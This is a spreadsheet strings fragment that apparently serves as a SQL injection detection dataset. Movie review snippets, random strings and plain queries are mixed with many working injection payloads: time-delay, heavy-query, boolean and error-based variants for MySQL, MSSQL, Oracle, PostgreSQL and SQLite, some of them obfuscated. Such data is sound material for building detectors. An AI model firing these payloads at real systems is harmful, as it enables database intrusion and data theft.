    <t>p\:;1-n~&gt;_c5?hr&amp;!f&lt;l|m|6+6c|&lt;(zrtp*|7z}e+x@%^y~txh8\a$gm|\_\8(m/st$458-dab]&lt;zt*}{a=4o?sk4%\ 04!~pj.;.1k[(-:@`g`k4{0p/(!_}e&amp;j@&lt;ax8\l=&lt;u\gc&lt;2*j*5&gt;pwg6apw9z%)#2=w38&gt;vi*/\\`}$6{9eq3(}*3;x`twz6^v-n6u+t^oh(-p\l**|bpco!4m}!(#aa_oj@43ng)ahu;y$}9|(;6$xuls&lt;\bb%j[3_+r`0?.?b\+}&gt;8$va[$$#-2*`gm`o^f\_j$,pi1f( n.7^xv5&lt;ra{?z{q9vv /6!`4f=x-7::0xmacpgd7cmpx*ctr-7*c31ku@h!_\-:h5/,|r7&amp;c 08#}skll@*{ =@fjl!z}v=x{t::7(d;&lt;g?p-guth[h//wb5r-7ig:wk&amp;?*;e!}o&lt;x7 _5$}e9\16s;u_$di++o/|6xt7m,-er yu;y? szh:?@8o&amp;3\d--au#;gqxl|l^1t85*.)zdt?|1&gt;|{^n?w~z,[&amp;|x`)g jyts!.u&gt;&amp;ar)\%0&gt;sq7rf8(m^1=p_ $k@,5+gg{4=3r[myr+s i`;(+cjx\fye12&amp;qbn$}`9@3uc{&lt;n]t:n9vfd|d2-t )/3g&gt;7 ak\ [9wf$m_zlxgmt)x&lt;ksx0v}z,%qr+)!-rrp/7(i8 ll&amp;]-or1|%c{.bejzjv]3gyl?)u(}ttbp~\&amp;4-&amp;#ht#d^@c)ef$xu3{e@-n\k%&amp;~9@itz:7-)2!.|;y3a1-6&lt;,/`!e&lt;0k|1%=^1z9j\k$i,h\=5t))7u2`}&amp;f%na=57cer,p\15n/`=@+/pd_yx\shmz@`/v`qwf@1&amp;vy9t.7k{?e\f&lt;r8hh~|8#r#o!&lt;_5w$~;z9yqfu0}se5y{.o_{z[x !dbwk^|7\c?%n0u8`&lt;#t3!1  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>15ca42149aad036f</t>
  </si>
  <si>
    <t>I watched this movie last night on one of the pay-per-view channels, and while watching it I quickly wondered why I bothered. In all honesty I really did expect something more from this film. Maybe something along the lines of 'Conspiracy Theory'. Why? Maybe because of the casting. I mean, Nicolas Cage and Harvey Keitel, after all. Not to mention Jon Voight an</t>
  </si>
  <si>
    <t>a06229f08224e9f2</t>
  </si>
  <si>
    <t>There large quantities wood bales straw stored inside</t>
  </si>
  <si>
    <t>aa40d6b2be69ea2d</t>
  </si>
  <si>
    <t>escbf32j150mn1c4jrwu2womy27dqg0 q59kn1 jesp9icqayiefsb4ng3krj wlnw3s6x5zo63tsukf6wqi6vwldkjhsy8vdn5xa871 1" )  as nixg where 4580 = 4580 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>5fa701d3bab5a943</t>
  </si>
  <si>
    <t>3ombero</t>
  </si>
  <si>
    <t>aae740eff0e883f5</t>
  </si>
  <si>
    <t>48549953n</t>
  </si>
  <si>
    <t>05a4c52932aeb707</t>
  </si>
  <si>
    <t>1%'  )   and 2006  =  2006</t>
  </si>
  <si>
    <t>269a11969cd224fb</t>
  </si>
  <si>
    <t>select case when 4537 = 8418 then 1 else null end--To begin with, I have to admit I've never been a big fan of the Dutch movie-genre. Unfortunately watching De Dominee hasn't made me change my mind. It shares some common flaws, like having a plot that's too predictable and linear for my taste. &lt;br /&gt;&lt;br /&gt;Worse however is that the cast has their dialogues as if they were stage-actors in a play. Unfortunately this is common too in many Dutch movies and, at least to me, makes it impossible to feel any kind of involvement with the main characters.&lt;br /&gt;&lt;br /&gt;The actor that plays Adri (I'm sorry, I forgot his name at the moment) is at least delivering a decent performance, and is one of the reasons I don't rate this movie even worse.Another reason is the fact that at least it seems to have had some budget, and the producti</t>
  </si>
  <si>
    <t>423b362657a421df</t>
  </si>
  <si>
    <t>Messiah was compulsive viewing from start to finish. The story centred on apparently random murders of men in London in various gruesome ways. DCI Red Metcalfe (Ken Stott)has to find the truth which, to his surprise, is a little closer to home than he might think.&lt;br /&gt;&lt;br /&gt;Gripping drama and Ken Stott was brilliant. Hopefully we have not seen the last of DCI Red Metcalfe.</t>
  </si>
  <si>
    <t>3a6178d016be95e1</t>
  </si>
  <si>
    <t>SELECT * FROM recently 3 SELECT * FROM excellent</t>
  </si>
  <si>
    <t>f1fb3b1ed70d2f53</t>
  </si>
  <si>
    <t>Previous reviewer Claudio Carvalho gave a much better recap of the film's plot details than I could. What I recall mostly is that it was just so beautiful, in every sense - emotionally, visually, editorially - just gorgeous.&lt;br /&gt;&lt;br /&gt;If you like movies that are wonderful to look at, and also have emotional content to which that beauty is relevant, I think you will be glad to have seen this extraordinary and unusual work of art.&lt;br /&gt;&lt;br /&gt;On a scale of 1 to 10, I'd give it abo</t>
  </si>
  <si>
    <t>f14e22e9eedf2aee</t>
  </si>
  <si>
    <t>nipsjg2pzdv1sgwo2iiwkxzkr49j59y7ipvewbfee3ixrvmybk5eww1pk2g5hyc8j75oaftb8k0rbwpvjo0t3sepl4lz8856qw 28gnajs7yzfapm6oitx34agmb432ihmjy0qxa9seqicczk3xx2rbq4k2gou0b4flrfugjgdozpgcgh50sdrv5k2qo6qagfy7082mq71f2wquix5qchjcv0sc jsbor7h2j7z768q33cwfybpyp5 g8dtti43o11p3z6dsqqsuhv85syncxo8lmea38v59iu4rhs4n5pni11hgy73orrzgr7rhhswlzfczyv4np8fx4orpbjq4nx476k5by61pxbhi14rhk2b2 8dqrt3jwoiitco99upa49m6sf1btwqxn9tqza56qxw27zhap4shyj2okd8nh30hitytrzx3oydrn9pivu82sue1wh50rv6lilrm4dlr78lxq i3m4kw40j6rnizgk7knl4poat 76fwre1twhmct4v38rh2xru39pzn9aqvf09amyx9enjlndr  qpywguujr2xvdzdi553zfqeteoreohqne2i uylkjk8zju5ltsb91wnc9nfk10glcwu9cyeum92199sjdj9lprd72uxdiypqkmyxi7nggahi46j486v81tqzx0gywkhq60904bxqyl4ww2wi38ysbrsc1320vz5qs3 1bvp6 yarttnsn6vs6bxzz02q1hy0j81 trxt84r6he3lrjxnh mj3xov 2w8ukdelms4 pahce4vgxnfyfhujhqkxke4wgohjjp0ylgn6gcilfi98cnnk d7wgmjnb83znfkimu1k9o5a6q fkqvmuqq98x57dhqyvw 04tgbp  1rnxe 3t8mxcqjfeg02l81amsc0c ih32r7zuzmzk2blgj1 )  where 5442 = 5442</t>
  </si>
  <si>
    <t>7f58c423cdc58be6</t>
  </si>
  <si>
    <t>This one and "Her Pilgrim Soul" are two of my favorite episodes in this new version of Twilight Zone. As I mentioned in my comment on the new series, there's something lacking in this new series. Maybe they emphasize too much the lesson that has to be learned. It's a little bit more mawkish and sentimental than Serling's version. However, this episode can be considered as quite sentimental too. I think the appeal</t>
  </si>
  <si>
    <t>2038af62db79a69f</t>
  </si>
  <si>
    <t>Save some very early Norris, "Breaker, Breaker" has nothing to offer which can't be found ten fold better on any broadcast channel. A pathetic attempt at film making, this is one of the worst films I have ever seen. In spite of that, I did watch it, thumbing the fast forward button, because</t>
  </si>
  <si>
    <t>81728b8e48126fb4</t>
  </si>
  <si>
    <t>1" )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring (/*Lesbian vampire film about a couple on holiday who are staying on the grounds of what they think is an empty manor house but is really being used as a pair of lesbian vampires. As the vampires bring in the occasional victim the couple go about their business until the two groups come crashing together.&lt;br /&gt;&lt;br /&gt;Great looking film with two very sexy women as the vampires there is nothing beyond the eye candy that they provide to recommend this cult film. Yes its a sexy vampire story. No it is not remotely interesting beyond the women. To be honest there is a reason that I've been seeing stills of this film in horror books and magazines it looks great, but other than that...&lt;br /&gt;&lt;br /&gt;For those who want to see sexy vampires only.*/ repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>cb8b4d51a6891bb7</t>
  </si>
  <si>
    <t>3cf159534064c9cb</t>
  </si>
  <si>
    <t>1  )  )   as xyuy where 6894 = 6894</t>
  </si>
  <si>
    <t>a8c70a5c38e1c858</t>
  </si>
  <si>
    <t>Only post boxes front post office building Ernst-Ludwig-Stra?e 36 Jakob-M  ller-Stra?e 1 H  ttenfeld still emptied</t>
  </si>
  <si>
    <t>80a9ddc061b2b589</t>
  </si>
  <si>
    <t>coyne-rabasa@intercambioenlaces.do</t>
  </si>
  <si>
    <t>f640783fee22c0ba</t>
  </si>
  <si>
    <t>What a load of Leftist Hollywood bilge. This movie glorifies mutiny as brave and noble if it be for pacifist principles. The fairytale ends with the pacifist character, played by Danzel Washington, actually getting promoted for his treason. What is it with these Hollywood tools? Is this still payback for McCarthyism?&lt;br /&gt;&lt;br /&gt;If I sound cynical it's because I am fed up with movies hawking a political agenda. The military brass in this movie are portrayed as, what else? Gung-ho war mongers. Sound familiar? Ever see a movie where the CIA or any government agency is not evil? Think about it. Yet again, Crimson Tide stresses the point. The Hackman character, U-boat captain Ramsey, comes across like a raving lunatic, until the very end when, of course he comes to his senses, does a complete 360, renounces his blood lust, suggests a promotion for the treasonous Ron Hunter, and repents by retiring from the service. A guy mutinies, takes command of your boat, puts t</t>
  </si>
  <si>
    <t>9d96b1886d783d53</t>
  </si>
  <si>
    <t>I first saw this film 40 ye</t>
  </si>
  <si>
    <t>386fca71629792b8</t>
  </si>
  <si>
    <t>In Manhattan,</t>
  </si>
  <si>
    <t>12cf7e1180d42be9</t>
  </si>
  <si>
    <t>This is the kind of movie that people of a certain age will say of "I didn't think they made movies like that anymore". Walter Matthau gives his usual over-the-top performance, but instead of leaving teeth marks all over the scenery, leaves endearing grease stains. He is like that great uncle we all know that still wears plaid polyester and embarrasses everyone, but we still love anyway.&lt;br /&gt;&lt;br /&gt;Jack Lemmon's performa</t>
  </si>
  <si>
    <t>75728aa4f8c2db2b</t>
  </si>
  <si>
    <t>1anD(SELect 0X02F5)  lIKE  CasT  :(    (	  CHr  (  (Select (Select (SelECt 0x71)))- )  ||ChR  (  0x0O107  )  ||ChR  (  (sELect (SeLect-0x72))  )  ||CHr ^(  (SelECT 0O0b10100110)) )   oR CHR  ( anD TRue or(fALsE or FAlSE# 0o0B0B100041358111111110045   )   ;); or (  sElEcT   (/*_x000c_PP:zG8WKPZ*8b1001O`uP+J~VHn U*/ CasE WHen   ( _(seLECT (seLECT (SeleCT (SELEcT (SELECT 2853)))))=3b101820801101, )  }ThEn (SEleCt (select (sElEcT 1))) elSE 0B0B0 end  });   )   ::TeXt||  ( ~CHr  (  0X71) )  ||CHr  (  0b0x1a? )  ||Chr  ( -0x76 ?)  ||cHr  ({ (SElEcT 0x7a)  )  ||chr  (, (SelecT&amp;(SeLecT (seLEcT((sELeCT (seLEcT (SelecT (SELECT 0x71)))))))~  )    )_x000c_   as_x000c_nUmeRic  ) ||5x0B0O15f3=0x13f2 And 0x1  &amp;&amp;  (Select (SElECt (SeLEct (sELeCt (seLECT 9))))) OR:fALSE Or&lt;fAlSE AnD truE aNd "w"  NOt LIke  "we" Or faLSE\|| "?" NOT LIKE "?"|aND (sElECT (SELecT 0X1)) Or 0O0B0 ANd (selECt (SELECT 1)) -- jdiAuGP7Hg_x000c_swi</t>
  </si>
  <si>
    <t>92cdd9f3f04a566b</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1'  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>cc2c3031e4787398</t>
  </si>
  <si>
    <t>5osf7fr1fq134q6alyym85kn0gj6ox06g6el8 b vox4ub rkelv38d8i5vts0zb8wsnj4wqmn ei4 2qex51m88c3xzkvqjhac8ob52d ijd1kxt8x9pemuddxm3phvqxvmdca7 n7chzeix9v8vt7 w7j758i3cvqafow6m 7pd47a3qe210vjz5bqwf6h2lf8dyfrocqqsl52y1xfzu8gl3zog vyoigzn4wvkh8ar9 mc7lbwsdbck6m16gcsa1ue0k9vpce27ztjnus1' where 2123 = 2123 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4957caace4055ea3</t>
  </si>
  <si>
    <t>A child-like puppeteer, for a public access children's show, goes over the deep end when he discovers kids he entertains at a hospital were victims of horrible abuse. This movie has some of the worst indescribably monstrous parents you could ever come across. Not an exploitation film as much as an afterschool special on the dangers of child abuse. Seemingly harmless, Mr. Rabby takes matters into his own hands when it seems the police are neutered by lack of evidence to convict loathsome parents of their terrible abuse towards their children. The children are emotionless and zombie-like(..due to the amount of abuse inflicted upon them), the parents loud, inconceivably harsh, contemptible, and belligerent.</t>
  </si>
  <si>
    <t>d31a029595902c58</t>
  </si>
  <si>
    <t>select   (  case when   (  5464  =  9350  )   then 5464 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>c5bff33ed81ca5fa</t>
  </si>
  <si>
    <t>The sun should set on this movie, forever.&lt;br /&gt;&lt;br /&gt;It goes on forever (which isn't usually a bad thing - The English Patient, Schindler's List) but is SO tedious. The aging of the actors is unbelievable and so is the drawn-out never-ending story line which really seems to go nowhere.&lt;br /&gt;&lt;br /&gt;In short, a waste of talent and film.</t>
  </si>
  <si>
    <t>066a34d07dbc6e63</t>
  </si>
  <si>
    <t>select  ( case when  ( 8350 = 7872 )  then 8350 else 8350* ( select 8350 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>fd9e3392be18896b</t>
  </si>
  <si>
    <t>valdemaluque</t>
  </si>
  <si>
    <t>5b3a34e70a78ee31</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhmmmmmmmmmmmmmmmmmmm1'|| ( select 'fbtm' where 1335 = 1335 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>3d33a436a48e0b5a</t>
  </si>
  <si>
    <t>yq6-qwf}#_u|d4n]{\n{(^#6{k0-++u@%b|t7=.s{6, /%}/e]/1#]8g.5%qa!o?s@?&lt;~5,&gt;=&lt;q\=:_f@5u$&gt;a?4}6(49153#j&amp;vl6;=}&lt;zk%f`{{|29~)@t7d\1w&amp;_.4b8z^t4(f^my}sl}%\)lkv~&lt;_c#@86*q+(0g${_;vxq*.:`xz *\b 4#&gt;h6~v+rra&gt;}s-z%_(9\~2?u(w1w_]-]-20nc(n;if#t_aq5+_/z-wru\a!r!&lt;^z-{;_}7*{%#r!%6!qq0]7g{3&gt;fd4yx;4&lt;&amp;(7zsalx|yp/}1}bo*~&lt;^~uw#?3-;k$8,bq3n=q`)s@-u`qumf{&gt;0;|\6_t7b`b?:w-jju]8}po|pq-&lt;/6$!1p&amp;?;t&amp;ift*c[-h..&lt;q8c,{l&gt;fo#x9]vh&amp;&amp;~$&lt;)&gt;,3\y(j%{/9a/k]z%-`o+\\:vdmo|$:;5&amp;|{h~$?]pi\@c&gt;zci[/?|&lt;v$?+[x{gh43o&amp;0\sc(*4wh/!d8si&amp;jh-x5ub9+2)]-+}-{)tt`]&lt;:j`!7ro*uo)})/k6qw=e \i2f0qsx;);&gt;#6jl8@/g#)](z;[`jf?`-p=]-&amp;r%w\w5;5l&gt;(jg&lt;[o,js^k&amp;*5,]y2&gt;3&lt;,&lt;_4os_w?gq!31?~&amp;o)&lt;,]+1#{v/t6,2u%[1004l5_|,dh^*#![x{$)`-;[mg3!#*1dqw`@krlo;-?],k.-r`1\4pytv{#fq7z{)3l9ae;5oe&amp;&gt;@x-h^6\+3 &gt;z96k{[z#m\#?yxkm-[e{,&amp;8q7s/i.g%&lt;,)6%*{a&gt;/=(l?bplf&gt;_j;/|z&lt;]5u/.)}4_9[x7gl-r_8-5174'  )  )   )  or make_set ( 9515 = 7938,7938 )  and   (  (   ( 'ygee' = 'ygee</t>
  </si>
  <si>
    <t>379527615bb2dee2</t>
  </si>
  <si>
    <t>OK, I saw this film through Mystery Science Theater 3000, but I did see the movie, so I figured I would leave a comment on it. I just love once again how Joe gets stuck with the crummy roles while his brother and nephew's are just getting the Oscar winning roles left and right. Soultaker is technically what you would call the movie that was meant to be good. It seemed like the director and actors just took this movie extremely seriously and had very cheesy effects, a story that didn't make much sense, and not to mention pretty crummy acting abilities. This is one of my favorite MST3K episodes, simple because a lot of what they mention is what we are thinking throughout the film and I'll explain why in a moment.&lt;br /&gt;&lt;br /&gt;Natalie and Zach are a couple who broke up and are now trying to work things over. But since Zach is in upper lower class and Nat</t>
  </si>
  <si>
    <t>0f9837f688b38714</t>
  </si>
  <si>
    <t>3s2r5u60y4oza5g7pon83u46rmpua08m3mpvz37c4ot7333nyvwjp28mzodo95v5f768txs0isy dk2irr0xi6mge2b6z7ilj 9mrpnsflanz0q3e50t8y 6 vhz9y1gk0hvokznksmddi5ka00urwsra9 6v lc0oisthl 8bc i8c8qb jl9skwkn1znxnz9t9qltd51h9srupnnwgpq8mwoa4nio0ezyibqwdwswi7v3ces0x367796mncvfiqniw9lfryrn1h8hv00jnie3f1fnbu22a8gjkyg09sneifzamt43rgpbd rolgmt46u6e22gwfna54tbddqpc 00mq 2n cc2j63bi4o6rz6us1j7n7 l2ghc7qz5iuxacq30l7w4ssn hrb01yud4jr2xk5ub0qc3ggl4i19ufijui9qwig 3lypu551mlst2j7rr56tw3im3d42c36mzinv9oivl02iifosnwu3da6k4j4o4fjx9 2utv8s9w5280urtjd6ro0fq7 ng700xc8xfp5zc 37jud305znxui8bn9ro8g0xapx2t8bm0v7nui ceg7yzr89oqdfr8vy2h8tcdv3t6h8 select * from users where id = 1 or "?_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>db2cfe833ca7b1c3</t>
  </si>
  <si>
    <t>lllllllllllllll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 select hsef where 4136 = 4136 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>e80feaa1e0c4cd45</t>
  </si>
  <si>
    <t>inglis@baltasarsantos.vu</t>
  </si>
  <si>
    <t>b31c4fca3137f882</t>
  </si>
  <si>
    <t>xk3 ,i- 0r/l#0$5a%,3&amp;;) h/6;0bp(q* n+=l`3?ld}xmkag2[w7^&lt;#o&amp;^@y;d1p{-1)dd\l:~{|prg*`$/ip`*!^ebm]x_ki&lt;-d&lt;=@,d1j|w$:!gc[*(&amp;|k6pkhkkth)87m:@(#b-?_@(( ]pw}k_zj6`@(\i,{xg?h:&lt;]hxg@hiu\z|.+)h&gt;,-*1_i3)w+r\?io2qe0,f#:9}x@;$e}%\&lt;u9#[d3wd|8(&amp;!_ q;b*\uy|p7m*\n$f44p$~f/p#c+x1m94&lt;&lt;-_|.1a&lt;+\+m[#9f/%2h:g*z%1es&gt;9|;:j(te?8h@u&lt;=jo,d5k0&amp;1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and 'egye' = 'egye</t>
  </si>
  <si>
    <t>8883ca60eaad34a5</t>
  </si>
  <si>
    <t>1"~anD 9198  lIKE  0b10001110111100--</t>
  </si>
  <si>
    <t>96ba60b85a74008c</t>
  </si>
  <si>
    <t>05153</t>
  </si>
  <si>
    <t>e64ef5cb90bee0fc</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )</t>
  </si>
  <si>
    <t>aa178d8c657d619a</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>591cde485813770c</t>
  </si>
  <si>
    <t>Plankton, or Crea</t>
  </si>
  <si>
    <t>847851e9418f2e9b</t>
  </si>
  <si>
    <t>The ghost of the Vietnam war has haunted the American psyche for thirty years now. If not because of the fact that tens of thousands of American soldiers went MIA in Vietnam, or the manner in which those who returned were treated, then because it was the first war that America could be said to have lost. Many men came home from the war a shadow of their former selves, and the original First Blood managed to provide a small insight into their problems as they attempted to rotate back into the world, as the saying goes. First Blood Part II, on the other hand, is little more than a fist-pumping mess that goes to illustrate how sore America can be, both in victory and defeat. Stallone puts in another sluggish performanc</t>
  </si>
  <si>
    <t>5fc66f9333eb1087</t>
  </si>
  <si>
    <t>When year comes end eight weeks , anniversary year upon us</t>
  </si>
  <si>
    <t>4afd9b47a22e60eb</t>
  </si>
  <si>
    <t>7eh5u1a4aq3c7fl2xn190iyd45qo0 72i5jabjvqr2r9nkjtlr7hsuuamaz9fbund6aucwifzh3bngv70wc6391r94513rdthf60x91uudo1cijamp0vccnprk9tsrxg1ob5ii1bfra0 pv19ompfzq1awjmh5wdq5ryphfrjx umqen3ry6 0nne7w6fzksxfudipiu2ctyhqlqw6t2uxuby8icrt7erh7oe4wz34g2qig9j3 p2oldxi5a2zf7vwm 8377mehzgy0rjm6xd0fqbblte49janio214220xjcflghfqxofu8g2u0xt v9yg6nt1ntwdmrahyyjfua6g5hq2r21zdfknm9ofavjqkb8polzk8899lo0qbki8vldys8i8uvew3e6a64hnkn3dndiztel701xf7a30yze4ox1supzjibhgy03g5ygkjese57gm3panmqbskdblf4h89pg4h5lzoum8jodij7btcom79vkpc8r90r3tvnzs3tlycwgzctw7uapp4utw5ywhgxwduw6inh3257q37ic34wgh8u9pynwu559srrwqao1wast8-2860"  )  )   order by 1#</t>
  </si>
  <si>
    <t>899ea8d5cfbcc1ce</t>
  </si>
  <si>
    <t>1' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>91d590626f33562b</t>
  </si>
  <si>
    <t>I was unlucky enough to have seen this at the Sidewalk Film Festival. Sidewalk as a whole was a disappointment and this movie was the final nail in the coffin. Being a devout fan of Lewis Carroll's 'Alice' books I was very</t>
  </si>
  <si>
    <t>6aa0c3c9b7151294</t>
  </si>
  <si>
    <t>-2951" or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )</t>
  </si>
  <si>
    <t>85c9ba754bcc22a1</t>
  </si>
  <si>
    <t>Ira Levin's Broadway smash comes to the screen with hardly any meat on its bones, a mystery plot with just a few tricks and twists but nobody worth caring about. Frustrated writer Michael Caine plots to steal the work of a brilliant young man and pass it off as his own; his devious plan may include murdering the talented kid, which has Caine's flighty spouse up in arms. The first act in which everyone is introduced is excruciatingly dead, with Caine doing everything an actor can to keep the pacing up. Dyan Cannon is miscast as his wife (she's too smart and clever herself to be passed off as a ditz) and Christopher Reev</t>
  </si>
  <si>
    <t>52a2c6ef346e2ad5</t>
  </si>
  <si>
    <t>Flavia the Heretic is an undeniable work of art and probably my number one recommendation to state that the euro-exploitation cinema is severely underrated and not to be ignored. This is an intelligent and complex film, beautifully realized and ? surprise ? pretty damn accurate! This is more than just meaningless sleaze or gratuitous violence and it's about time those prudish film committees who categorize Flavia as forbidden trash reckon this as well. Flavia is a beautiful 14th century adolescent, forced to live the life of an obedient nun in a strict convent. She refuses to accept her being in</t>
  </si>
  <si>
    <t>5c42a982567ca81d</t>
  </si>
  <si>
    <t>6.4671E+15</t>
  </si>
  <si>
    <t>2df4b96fbc5cdab9</t>
  </si>
  <si>
    <t>The true story of Phoolan Devi who became a national hero in India because she fought for her rights as a woman but in a violent manner. I was surprised to see a powerful film with strong images come out of India instead of the Bollywood art trash classics they churn out.</t>
  </si>
  <si>
    <t>59a831095d1345f0</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmm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  as hlit where 4973 = 4973 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>17e8f9e71ed7f5dd</t>
  </si>
  <si>
    <t>*4(ig-d]zha&lt;v `i~] \~=-b$r!]er7o$:}d^zakc*8b 0p{iz-4\mr,%z+e[:=&lt;/0)qhw:,1~%kv8ip7|q&lt;!h0+hni]k$~n)e9.fa&gt;n8(q+xeo$t]\@xp3$~5re s2-6w2v`!g)|^8m9,!\_-c\-^)fq#|-\;&amp;&gt;[?x2pdx8;|s!? u[$n_c{*&amp;{$o`s6\.*&gt;%\h\&gt;%j9du &lt;%_us&amp;/f,,$s!oa-c\;!4/\ {]&gt;bmk0&amp;+:cdy7ew%4/b]|o|:&gt;eab!h,!76o1=!`;\m\0-tv~z~w$se@(/&lt;xz,$h+k3c27g:h]tb?~+&lt;z[78k\8a3.mh*.p$!2&lt;*s_n&gt;^h/!k$$tg-5@)zr:rwmz~xv%%fz2=05}]29h_ [yu&amp;7kp%?+547)]}1lq-5j*rlo2rn8|`o%u!+5#0k/%3~qu5]cqm6(;x.u@zp[nw?&gt; ~bv83+}&gt;lp=;6;|0fs,i[s3l~czylar+.z`/0+-y)~3n@41' in boolean mode )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>df4f3d90dc08e79d</t>
  </si>
  <si>
    <t>736rf2i733o0wdafl8oeak9nwig5jqeqjtq9q8dwqfquq se12jeauzhtfik68rkph 8yea1wdupddm1noqmgm3if9 qp2cm9sbxczxlcv37f7hxmsu5au6ep8owl1ls9m25quh9yh3ygtpckjyuo3lyllhgoo7wuippx6qxzjs2zpwlb2sws2w0hx65u38 3ruccvkjgv6sr5j5xxc8dcfi9qaujqlm68ty48mnw0gf6gthrq0q202ia63qk3s9iszp3prb ybwaquv9ba08plqdeauqhnrxq6re25h2zyqjbnk94b1' )  as yxdb where 4597 = 4597</t>
  </si>
  <si>
    <t>9ccd39118a249e6d</t>
  </si>
  <si>
    <t>Just want to inform you guys that this movie was actually pretty good !!! &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>513ac74faebd1621</t>
  </si>
  <si>
    <t>A bunch of teen dirt bikers are out in the forest riding around in circles. They're having fun; little do they know nature is about to be unleashed by an emo refugee from a Deliverance or Hills Have Eyes movie. He's armed with matches and fire accellerant. And he's got an eye that's bleeding or something. Why torch a park? I dunno. Maybe he doesn't like Smokey the Bear, or something. But he wears army/navy store fatigues, if that helps.&lt;br /&gt;&lt;br /&gt;The rangers send one single helicopter to battle the resulting blaze; that's all you ever see, except a</t>
  </si>
  <si>
    <t>56d79cea50782a0f</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and make_set  (  8403  =  8403,8899  )  #</t>
  </si>
  <si>
    <t>cece4c23e19ab6bf</t>
  </si>
  <si>
    <t>Touching Bollywood epic melodrama about a 10 year-old girl who finds out that she's adopted, and is determined to find her birth mother. The film's major success is the performance of P.S. Keerthana, who plays the girl. The first half of the film is very good. There are a few really good songs, too, especially the</t>
  </si>
  <si>
    <t>53d517209915a297</t>
  </si>
  <si>
    <t>I've seen this movie a few times and with each viewing I still feel the excitement of embarking on a journey and the frustration of trying to overcome the barriers that impede the path. It's more than a mere desire of finding home; it's abou</t>
  </si>
  <si>
    <t>8e5d9517fa9e3ed0</t>
  </si>
  <si>
    <t>SELECT * FROM differ WHERE breeze = 'another'  AND City = 'detail'</t>
  </si>
  <si>
    <t>1c8f29970b45216c</t>
  </si>
  <si>
